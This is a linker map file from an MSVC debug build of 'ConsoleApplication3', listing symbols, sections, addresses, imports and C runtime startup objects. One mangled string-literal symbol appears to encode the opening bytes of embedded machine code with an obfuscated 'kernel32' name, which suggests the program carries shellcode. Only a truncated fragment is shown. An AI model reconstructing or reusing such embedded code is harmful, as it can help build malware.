0002:000000cc ___xt_a 004030cc MSVCRTD:initializers.obj
0002:000000d0 ___xt_z 004030d0 MSVCRTD:initializers.obj
0002:000000e0 ??_C@_0CDL@EKBHJHJD@U?$IL?l?$IB?l?$BM?$AC?$AA?$AAS3?$NL?GE?$NMkernVW?GE?$OAel32?GE?d?4@ 004030e0 ConsoleApplication3.obj
0002:00000388 __load_config_used 00403388 MSVCRTD:loadcfg.obj
0002:000003f0 ___safe_se_handler_table 004033f0 <linker-defined>
0002:000006dc ___rtc_iaa 004036dc MSVCRTD:_initsect_.obj
0002:000006e0 ___rtc_izz 004036e0 MSVCRTD:_initsect_.obj
0002:000006e4 ___rtc_taa 004036e4 MSVCRTD:_initsect_.obj
0002:000006e8 ___rtc_tzz 004036e8 MSVCRTD:_initsect_.obj
0002:0000072c __IMPORT_DESCRIPTOR_VCRUNTIME140D 0040372c vcruntimed:VCRUNTIME140D.dll
0002:00000740 __IMPORT_DESCRIPTOR_ucrtbased 00403740 ucrtd:ucrtbased.dll
0002:00000754 __IMPORT_DESCRIPTOR_KERNEL32 00403754 kernel32:KERNEL32.dll
0002:00000768 __NULL_IMPORT_DESCRIPTOR 00403768 vcruntimed:VCRUNTIME140D.dll
0003:00000000 ___scrt_native_dllmain_reason 00404000 MSVCRTD:utility.obj
0003:00000004 ___scrt_default_matherr 00404004 MSVCRTD:matherr.obj
0003:00000008 ___security_cookie_complement 00404008 MSVCRTD:gs_cookie.obj
0003:0000000c ___security_cookie 0040400c MSVCRTD:gs_cookie.obj
0003:00000010 ___isa_enabled 00404010 MSVCRTD:_cpu_disp_.obj
0003:00000014 ___scrt_ucrt_dll_is_in_use 00404014 MSVCRTD:ucrt_stubs.obj
0003:00000018 ___@@_PchSym_@00@UfhvihUBCDEUwvhpglkUzoovmylbwytUxlmhlovzkkorxzgrlmDUxlmhlovzkkorxzgrlmDUwvyftUhgwzucOlyq@F41B9653F8CADDCF 00404018 stdafx.obj
0003:0000001c ___scrt_current_native_startup_state 0040401c MSVCRTD:utility.obj
0003:00000020 ___scrt_native_startup_lock 00404020 MSVCRTD:utility.obj
0003:00000040 ?__type_info_root_node@@3U__type_info_node@@A 00404040 MSVCRTD:tncleanup.obj
0003:00000048 ?_OptionsStorage@?1??__local_stdio_printf_options@@9@4_KA 00404048 MSVCRTD:default_local_stdio_options.obj
0003:00000050 ?_OptionsStorage@?1??__local_stdio_scanf_options@@9@4_KA 00404050 MSVCRTD:default_local_stdio_options.obj
0003:00000058 ___scrt_debugger_hook_flag 00404058 MSVCRTD:utility_desktop.obj
0003:0000005c ___isa_available 0040405c MSVCRTD:_cpu_disp_.obj
0003:00000060 ___favor 00404060 MSVCRTD:_cpu_disp_.obj
0003:00000384 ___dyn_tls_dtor_callback 00404384 <common>
0003:00000388 ___dyn_tls_init_callback 00404388 <common>
entry point at 0001:000003a0
Static symbols
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 kernel32:KERNEL32.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 vcruntimed:VCRUNTIME140D.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0000:ffff8000 .debug$S 00400000 vcruntimed:VCRUNTIME140D.dll
0000:ffff8000 .debug$S 00400000 vcruntimed:VCRUNTIME140D.dll
0000:ffff8000 .debug$S 00400000 ucrtd:ucrtbased.dll
0001:00000030 ?pre_c_initialization@@YAHXZ 00401030 f MSVCRTD:exe_wmain.obj
0001:000000f0 ?post_pgo_initialization@@YAHXZ 004010f0 f MSVCRTD:exe_wmain.obj
0001:00000100 ?pre_cpp_initialization@@YAXXZ 00401100 f MSVCRTD:exe_wmain.obj
0001:00000120 ?__scrt_common_main@@YAHXZ 00401120 f MSVCRTD:exe_wmain.obj
0001:00000130 ?__scrt_common_main_seh@@YAHXZ 00401130 f MSVCRTD:exe_wmain.obj
0001:00000360 ?initialize_environment@@YAXXZ 00401360 f MSVCRTD:exe_wmain.obj
0001:00000370 ?invoke_main@@YAHXZ 00401370 f MSVCRTD:exe_wmain.obj
0001:00000420 ?find_pe_section@@YAPAU_IMAGE_SECTION_HEADER@@QAEI@Z 00401420 f MSVCRTD:utility.obj
0001:000004b0 ?is_potentially_valid_image_base@@YA_NQAX@Z 004014b0 f MSVCRTD:utility.obj
0002:000000ac ?pre_cpp_initializer@@3P6AXXZA 004030ac MSVCRTD:exe_wmain.obj
0002:000000b8 ?pre_c_initializer@@3P6AHXZA 004030b8 MSVCRTD:exe_wmain.obj
0002:000000bc ?post_pgo_initializer@@3P6AHXZA 004030bc MSVCRTD:exe_wmain.obj
0002:0000031c _GS_ExceptionPointers 0040331c MSVCRTD:gs_report.obj
0002:000006f0 __sehtable$?__scrt_common_main_seh@@YAHXZ 004036f0 MSVCRTD:exe_wmain.obj
0002:00000710 __sehtable$___scrt_is_nonwritable_in_current_image 00403710 MSVCRTD:utility.obj
0002:00000844 .idata$6 00403844 vcruntimed:VCRUNTIME140D.dll
0002:00000a12 .idata$6 00403a12 ucrtd:ucrtbased.dll
0002:00000b3c .idata$6 00403b3c kernel32:KERNEL32.dll
0003:00000024 ?module_local_atexit_table@@3U_onexit_table_t@@A 00404024 MSVCRTD:utility.obj
0003:00000030 ?module_local_at_quick_exit_table@@3U_onexit_table_t@@A 00404030 MSVCRTD:utility.obj
0003:0000003c ?is_initialized_as_dll@@3_NA 0040403c MSVCRTD:utility.obj
0003:00000068 _GS_ExceptionRecord 00404068 MSVCRTD:gs_report.obj
0003:000000b8 _GS_ContextRecord 004040b8 MSVCRTD:gs_report.obj
0004:00000000 __guard_fids__ 00405000 MSVCRTD:exe_wmain.obj
0004:00000004 __guard_fids__ 00405004 MSVCRTD:exe_wmain.obj
0004:00000008 __guard_fids__ 00405008 MSVCRTD:exe_wmain.obj
0004:0000000c __guard_fids_?pre_c_initialization@@YAHXZ 0040500c MSVCRTD:exe_wmain.obj
0004:00000014 __guard_fids____scrt_set_unhandled_exception_filter 00405014 MSVCRTD:utility_desktop.obj
0004:00000018 __guard_fids___except_handler4 00405018 MSVCRTD:_chandler4gs_.obj
0004:0000001c __guard_fids__ 0040501c MSVCRTD:guard_support.obj
0005:00000060 $R000000 00406060 * linker generated manifest res *
